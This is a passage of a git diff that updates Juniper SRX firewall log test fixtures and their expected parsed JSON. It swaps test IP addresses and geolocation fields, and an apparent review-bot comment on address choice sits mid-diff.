@@ -85,17 +67,18 @@ }, "related": { "ip": [ - "216.160.83.61" + "67.43.156.15", + "10.10.0.10" ] }, "client": { "port": 1, - "ip": "216.160.83.61" + "ip": "67.43.156.15" }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:34.661591150Z", - "original": "\u003c14\u003e1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.1.1.1.2.129 category=\"secintel\" sub-category=\"Blacklist\" action=\"BLOCK\" action-detail=\"DROP\" http-host=\"N/A\" threat-severity=\"0\" source-address=\"216.160.83.61\" source-port=\"1\" destination-address=\"216.160.83.61\" destination-port=\"24039\" protocol-id=\"1\" application=\"N/A\" nested-application=\"N/A\" feed-name=\"Tor_Exit_Nodes\" policy-name=\"cc_policy\" profile-name=\"Blacklist\" username=\"N/A\" roles=\"N/A\" session-id-32=\"572564\" source-zone-name=\"Outside\" destination-zone-name=\"DMZ\"]", + "ingested": "2021-12-10T10:14:13.629278700Z", + "original": "\u003c14\u003e1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@67.43.156.15 category=\"secintel\" sub-category=\"Blacklist\" action=\"BLOCK\" action-detail=\"DROP\" http-host=\"N/A\" threat-severity=\"0\" source-address=\"67.43.156.15\" source-port=\"1\" destination-address=\"10.10.0.10\" destination-port=\"24039\" protocol-id=\"1\" application=\"N/A\" nested-application=\"N/A\" feed-name=\"Tor_Exit_Nodes\" policy-name=\"cc_policy\" profile-name=\"Blacklist\" username=\"N/A\" roles=\"N/A\" session-id-32=\"572564\" source-zone-name=\"Outside\" destination-zone-name=\"DMZ\"]", "kind": "alert", "action": "malware_detected", "category": [ 
@@ -113,48 +96,30 @@ { "server": { "port": 80, - "ip": "216.160.83.61" + "ip": "10.0.0.1" }, "log": { "level": "informational" }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 80, - "ip": "216.160.83.61" + "ip": "10.0.0.1" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 36612, - "ip": "216.160.83.61" + "ip": "67.43.156.15" }, "juniper": { "srx": { 
@@ -203,17 +168,18 @@ "dummy_host" ], "ip": [ - "216.160.83.61" + "67.43.156.15", + "10.0.0.1" ] }, "client": { "port": 36612, - "ip": "216.160.83.61" + "ip": "67.43.156.15" }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:34.661598403Z", - "original": "\u003c14\u003e1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.1.1.1.2.129 category=\"secintel\" sub-category=\"CC\" action=\"BLOCK\" action-detail=\"CLOSE REDIRECT MSG\" http-host=\"dummy_host\" threat-severity=\"10\" source-address=\"216.160.83.61\" source-port=\"36612\" destination-address=\"216.160.83.61\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" feed-name=\"cc_url_data\" policy-name=\"test\" profile-name=\"test-profile\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502362\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" occur-count=\"0\"]", + "ingested": "2021-12-10T10:14:13.629290600Z", + "original": "\u003c14\u003e1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@67.43.156.15 category=\"secintel\" sub-category=\"CC\" action=\"BLOCK\" action-detail=\"CLOSE REDIRECT MSG\" http-host=\"dummy_host\" threat-severity=\"10\" source-address=\"67.43.156.15\" source-port=\"36612\" destination-address=\"10.0.0.1\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" feed-name=\"cc_url_data\" policy-name=\"test\" profile-name=\"test-profile\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502362\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" occur-count=\"0\"]", "kind": "alert", "action": "malware_detected", "category": [ diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log index edc8adbeedc..89a7b563c02 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log 
+++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log 
@@ -1,12 +1,12 @@
-<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.86 source-address="192.168.1.100" source-port="58071" destination-address="216.160.83.61" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"]
-<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.1.1.1.2.86 source-address="10.10.10.50" source-port="1402" destination-address="216.200.241.66" destination-port="80" category="N/A" reason="BY_OTHER" profile="wf-profile" url="www.checkpoint.com" obj="/css/homepage2012.css" username="user02" roles="N/A"]
-<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@2636.1.1.1.2.40 source-address="216.160.83.61" source-port="80" destination-address="216.160.83.61" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"]
-<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@2636.1.1.1.2.40 source-address="216.160.83.61" source-port="80" destination-address="216.160.83.61" destination-port="33578" filename="www.google.com/" error-code="14" error-message="scan engine is not ready"]
-<12>1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@2636.1.1.1.2.40 source-address="10.2.1.101" source-port="80" destination-address="216.160.83.61" destination-port="51727" filename="10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz"]
-<14>1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@2636.1.1.1.2.86 source-zone="trust" destination-zone="untrust" source-name="N/A" source-address="216.160.83.61" profile-name="antispam01" action="drop" reason="Match local blacklist" username="user01" roles="N/A"]
-<14>1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - 
CONTENT_FILTERING_BLOCKED_MT [junos@2636.1.1.1.2.86 source-zone="untrust" destination-zone="trust" protocol="http" source-address="216.160.83.61" source-port="58071" destination-address="198.51.100.2" destination-port="80" profile-name="content02" action="drop" reason="blocked due to file extension block list" username="user01@testuser.com" roles="N/A" filename="test.cmd"]
-<12>1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@2636.1.1.1.2.86 source-address="192.168.1.100" source-port="58071" destination-address="216.160.83.61" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"]
-<12>1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@2636.1.1.1.2.40 source-address="216.160.83.61" source-port="80" destination-address="216.160.83.61" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"]
-<14>1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.1.1.1.2.129 source-zone="trust" destination-zone="untrust" source-address="10.1.1.100" source-port="58974" destination-address="216.160.83.61" destination-port="443" session-id="16297" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Information_Technology" reason="BY_SITE_REPUTATION_MODERATELY_SAFE" profile="WCF1" url="datawrapper.dwcdn.net" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="0"]
-<12>1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.129 source-zone="trust" destination-zone="untrust" source-address="10.1.1.100" source-port="59075" destination-address="216.160.83.61" destination-port="443" session-id="16490" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Advertisements" 
reason="BY_SITE_REPUTATION_SUSPICIOUS" profile="WCF1" url="dsp.adfarm1.adition.com" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="3"]
-<12>1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@2636.1.1.1.2.129 source-zone="trust" destination-zone="untrust" source-address="23.209.86.45" source-port="80" destination-address="216.160.83.61" destination-port="58954" profile-name="Custom-Sophos-Profile" filename="download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar" action="BLOCKED" reason="exceeding maximum content size" error-code="7" username="N/A" roles="N/A"]
+<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-address="192.168.1.100" source-port="58071" destination-address="67.43.156.13" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"]
+<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@67.43.156.15 source-address="10.10.10.50" source-port="1402" destination-address="67.43.156.13" destination-port="80" category="N/A" reason="BY_OTHER" profile="wf-profile" url="www.checkpoint.com" obj="/css/homepage2012.css" username="user02" roles="N/A"]
+<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@67.43.156.15 source-address="67.43.156.13" source-port="80" destination-address="10.1.1.103" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"]
+<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@67.43.156.15 source-address="67.43.156.14" source-port="80" destination-address="10.1.1.103" destination-port="33578" filename="www.google.com/" error-code="14" error-message="scan engine is not ready"]
+<12>1 
2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@67.43.156.15 source-address="10.2.1.101" source-port="80" destination-address="10.1.1.103" destination-port="51727" filename="10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz"]
+<14>1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@67.43.156.15 source-zone="trust" destination-zone="untrust" source-name="N/A" source-address="10.10.10.1" profile-name="antispam01" action="drop" reason="Match local blacklist" username="user01" roles="N/A"]
+<14>1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@67.43.156.15 source-zone="untrust" destination-zone="trust" protocol="http" source-address="192.168.2.3" source-port="58071" destination-address="192.168.100.2" destination-port="80" profile-name="content02" action="drop" reason="blocked due to file extension block list" username="user01@testuser.com" roles="N/A" filename="test.cmd"]
+<12>1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@67.43.156.15 source-address="192.168.1.100" source-port="58071" destination-address="67.43.156.13" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"]
+<12>1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@67.43.156.15 source-address="67.43.156.13" source-port="80" destination-address="10.1.1.103" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"]
+<14>1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@67.43.156.15 source-zone="trust" destination-zone="untrust" source-address="10.1.1.100" source-port="58974" destination-address="67.43.156.14" destination-port="443" session-id="16297" application="UNKNOWN" nested-application="UNKNOWN" 
category="Enhanced_Information_Technology" reason="BY_SITE_REPUTATION_MODERATELY_SAFE" profile="WCF1" url="datawrapper.dwcdn.net" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="0"]
+<12>1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-zone="trust" destination-zone="untrust" source-address="10.1.1.100" source-port="59075" destination-address="67.43.156.13" destination-port="443" session-id="16490" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Advertisements" reason="BY_SITE_REPUTATION_SUSPICIOUS" profile="WCF1" url="dsp.adfarm1.adition.com" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="3"]
+<12>1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@67.43.156.15 source-zone="trust" destination-zone="untrust" source-address="67.43.156.13" source-port="80" destination-address="10.1.1.100" destination-port="58954" profile-name="Custom-Sophos-Profile" filename="download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar" action="BLOCKED" reason="exceeding maximum content size" error-code="7" username="N/A" roles="N/A"]
diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log-expected.json
index 339ab20ebad..5f7fe473bb2 100644
--- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log-expected.json
+++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log-expected.json 
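Review bot: The CONTENT_FILTERING_BLOCKED_MT line swaps `destination-address="198.51.100.2"` for `"192.168.100.2"`, but 198.51.100.0/24 is RFC 5737 documentation space that is never routed or geolocated, so the old value was already a safe choice and this is needless churn in a fixture that should stay stable across regenerations. The other new private addresses (`10.1.1.103`, `10.10.10.1`, `192.168.2.3`) serve the same purpose, so the hunk now mixes two conventions for "public-looking but not geolocatable" hosts; pick one. Keeping `198.51.100.2` here (and reserving RFC 1918 space for addresses the log labels as trust-zone hosts) would make the intent of each address readable without a comment.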
@@ -3,29 +3,26 @@ { "server": { "port": 80, - "ip": "216.160.83.61" + "ip": "67.43.156.13" }, "log": { "level": "warning" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 80, - "ip": "216.160.83.61" + "ip": "67.43.156.13" }, "source": { "port": 58071, @@ -69,7 +66,7 @@ ], "ip": [ "192.168.1.100", - "216.160.83.61" + "67.43.156.13" ] }, "client": { @@ -78,8 +75,8 @@ }, "event": { "severity": 12, - "ingested": "2021-12-06T12:25:35.371156617Z", - "original": "\u003c12\u003e1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.86 source-address=\"192.168.1.100\" source-port=\"58071\" destination-address=\"216.160.83.61\" destination-port=\"80\" category=\"cat1\" reason=\"BY_BLACK_LIST\" profile=\"uf1\" url=\"www.baidu.com\" obj=\"/\" username=\"user01\" roles=\"N/A\"]", + "ingested": "2021-12-10T10:14:14.639402800Z", + "original": "\u003c12\u003e1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-address=\"192.168.1.100\" source-port=\"58071\" destination-address=\"67.43.156.13\" destination-port=\"80\" category=\"cat1\" reason=\"BY_BLACK_LIST\" profile=\"uf1\" url=\"www.baidu.com\" obj=\"/\" username=\"user01\" roles=\"N/A\"]", "kind": "alert", "action": "web_filter", "category": [ 
@@ -97,14 +94,26 @@ { "server": { "port": 80, - "ip": "216.200.241.66" + "ip": "67.43.156.13" }, "log": { "level": "warning" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 80, - "ip": "216.200.241.66" + "ip": "67.43.156.13" }, "source": { "port": 1402, @@ -147,7 +156,7 @@ ], "ip": [ "10.10.10.50", - "216.200.241.66" + "67.43.156.13" ] }, "client": { @@ -156,8 +165,8 @@ }, "event": { "severity": 12, - "ingested": "2021-12-06T12:25:35.371162518Z", - "original": "\u003c12\u003e1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.1.1.1.2.86 source-address=\"10.10.10.50\" source-port=\"1402\" destination-address=\"216.200.241.66\" destination-port=\"80\" category=\"N/A\" reason=\"BY_OTHER\" profile=\"wf-profile\" url=\"www.checkpoint.com\" obj=\"/css/homepage2012.css\" username=\"user02\" roles=\"N/A\"]", + "ingested": "2021-12-10T10:14:14.639411600Z", + "original": "\u003c12\u003e1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@67.43.156.15 source-address=\"10.10.10.50\" source-port=\"1402\" destination-address=\"67.43.156.13\" destination-port=\"80\" category=\"N/A\" reason=\"BY_OTHER\" profile=\"wf-profile\" url=\"www.checkpoint.com\" obj=\"/css/homepage2012.css\" username=\"user02\" roles=\"N/A\"]", "kind": "event", "category": [ "network" 
@@ -172,48 +181,30 @@ { "server": { "port": 47095, - "ip": "216.160.83.61" + "ip": "10.1.1.103" }, "log": { "level": "warning" }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 47095, - "ip": "216.160.83.61" + "ip": "10.1.1.103" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 80, - "ip": "216.160.83.61" + "ip": "67.43.156.13" }, "juniper": { "srx": { 
@@ -250,17 +241,18 @@ "EICAR-Test-File" ], "ip": [ - "216.160.83.61" + "67.43.156.13", + "10.1.1.103" ] }, "client": { "port": 80, - "ip": "216.160.83.61" + "ip": "67.43.156.13" }, "event": { "severity": 12, - "ingested": "2021-12-06T12:25:35.371164532Z", - "original": "\u003c12\u003e1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@2636.1.1.1.2.40 source-address=\"216.160.83.61\" source-port=\"80\" destination-address=\"216.160.83.61\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"]", + "ingested": "2021-12-10T10:14:14.639416300Z", + "original": "\u003c12\u003e1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@67.43.156.15 source-address=\"67.43.156.13\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"]", "kind": "alert", "action": "virus_detected", "category": [ 
@@ -278,48 +270,30 @@ { "server": { "port": 33578, - "ip": "216.160.83.61" + "ip": "10.1.1.103" }, "log": { "level": "warning" }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 33578, - "ip": "216.160.83.61" + "ip": "10.1.1.103" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 80, - "ip": "216.160.83.61" + "ip": "67.43.156.14" }, "juniper": { "srx": { 
@@ -347,17 +321,18 @@ }, "related": { "ip": [ - "216.160.83.61" + "67.43.156.14", + "10.1.1.103" ] }, "client": { "port": 80, - "ip": "216.160.83.61" + "ip": "67.43.156.14" }, "event": { "severity": 12, - "ingested": "2021-12-06T12:25:35.371189148Z", - "original": "\u003c12\u003e1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@2636.1.1.1.2.40 source-address=\"216.160.83.61\" source-port=\"80\" destination-address=\"216.160.83.61\" destination-port=\"33578\" filename=\"www.google.com/\" error-code=\"14\" error-message=\"scan engine is not ready\"]", + "ingested": "2021-12-10T10:14:14.639420Z", + "original": "\u003c12\u003e1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"33578\" filename=\"www.google.com/\" error-code=\"14\" error-message=\"scan engine is not ready\"]", "kind": "event", "category": [ "network" @@ -372,29 +347,14 @@ { "server": { "port": 51727, - "ip": "216.160.83.61" + "ip": "10.1.1.103" }, "log": { "level": "warning" }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 51727, - "ip": "216.160.83.61" + "ip": "10.1.1.103" }, "source": { "port": 80, @@ -425,7 +385,7 @@ "related": { "ip": [ "10.2.1.101", - "216.160.83.61" + "10.1.1.103" ] }, "client": { 
@@ -434,8 +394,8 @@ }, "event": { "severity": 12, - "ingested": "2021-12-06T12:25:35.371193667Z", - "original": "\u003c12\u003e1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@2636.1.1.1.2.40 source-address=\"10.2.1.101\" source-port=\"80\" destination-address=\"216.160.83.61\" destination-port=\"51727\" filename=\"10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz\"]", + "ingested": "2021-12-10T10:14:14.639424500Z", + "original": "\u003c12\u003e1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@67.43.156.15 source-address=\"10.2.1.101\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"51727\" filename=\"10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz\"]", "kind": "event", "category": [ "network" @@ -469,35 +429,20 @@ "user01" ], "ip": [ - "216.160.83.61" + "10.10.10.1" ] }, "log": { "level": "informational" }, "client": { - "ip": "216.160.83.61" + "ip": "10.10.10.1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "user": { "name": "user01" }, - "ip": "216.160.83.61" + "ip": "10.10.10.1" }, "juniper": { "srx": { 
@@ -510,8 +455,8 @@ }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:35.371205960Z", - "original": "\u003c14\u003e1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@2636.1.1.1.2.86 source-zone=\"trust\" destination-zone=\"untrust\" source-name=\"N/A\" source-address=\"216.160.83.61\" profile-name=\"antispam01\" action=\"drop\" reason=\"Match local blacklist\" username=\"user01\" roles=\"N/A\"]", + "ingested": "2021-12-10T10:14:14.639523300Z", + "original": "\u003c14\u003e1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-name=\"N/A\" source-address=\"10.10.10.1\" profile-name=\"antispam01\" action=\"drop\" reason=\"Match local blacklist\" username=\"user01\" roles=\"N/A\"]", "kind": "alert", "action": "antispam_filter", "category": [ @@ -532,36 +477,21 @@ { "server": { "port": 80, - "ip": "198.51.100.2" + "ip": "192.168.100.2" }, "log": { "level": "informational" }, "destination": { "port": 80, - "ip": "198.51.100.2" + "ip": "192.168.100.2" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 58071, "user": { "name": "user01@testuser.com" }, - "ip": "216.160.83.61" + "ip": "192.168.2.3" }, "juniper": { "srx": { 
@@ -602,18 +532,18 @@ "user01@testuser.com" ], "ip": [ - "216.160.83.61", - "198.51.100.2" + "192.168.2.3", + "192.168.100.2" ] }, "client": { "port": 58071, - "ip": "216.160.83.61" + "ip": "192.168.2.3" }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:35.371216319Z", - "original": "\u003c14\u003e1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@2636.1.1.1.2.86 source-zone=\"untrust\" destination-zone=\"trust\" protocol=\"http\" source-address=\"216.160.83.61\" source-port=\"58071\" destination-address=\"198.51.100.2\" destination-port=\"80\" profile-name=\"content02\" action=\"drop\" reason=\"blocked due to file extension block list\" username=\"user01@testuser.com\" roles=\"N/A\" filename=\"test.cmd\"]", + "ingested": "2021-12-10T10:14:14.639531800Z", + "original": "\u003c14\u003e1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@67.43.156.15 source-zone=\"untrust\" destination-zone=\"trust\" protocol=\"http\" source-address=\"192.168.2.3\" source-port=\"58071\" destination-address=\"192.168.100.2\" destination-port=\"80\" profile-name=\"content02\" action=\"drop\" reason=\"blocked due to file extension block list\" username=\"user01@testuser.com\" roles=\"N/A\" filename=\"test.cmd\"]", "kind": "alert", "action": "content_filter", "category": [ @@ -631,29 +561,26 @@ { "server": { "port": 80, - "ip": "216.160.83.61" + "ip": "67.43.156.13" }, "log": { "level": "warning" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 80, - "ip": "216.160.83.61" + "ip": "67.43.156.13" }, "source": { "port": 58071, 
@@ -697,7 +624,7 @@ ], "ip": [ "192.168.1.100", - "216.160.83.61" + "67.43.156.13" ] }, "client": { @@ -706,8 +633,8 @@ }, "event": { "severity": 12, - "ingested": "2021-12-06T12:25:35.371219626Z", - "original": "\u003c12\u003e1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@2636.1.1.1.2.86 source-address=\"192.168.1.100\" source-port=\"58071\" destination-address=\"216.160.83.61\" destination-port=\"80\" category=\"cat1\" reason=\"BY_BLACK_LIST\" profile=\"uf1\" url=\"www.baidu.com\" obj=\"/\" username=\"user01\" roles=\"N/A\"]", + "ingested": "2021-12-10T10:14:14.639537600Z", + "original": "\u003c12\u003e1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@67.43.156.15 source-address=\"192.168.1.100\" source-port=\"58071\" destination-address=\"67.43.156.13\" destination-port=\"80\" category=\"cat1\" reason=\"BY_BLACK_LIST\" profile=\"uf1\" url=\"www.baidu.com\" obj=\"/\" username=\"user01\" roles=\"N/A\"]", "kind": "alert", "action": "web_filter", "category": [ 
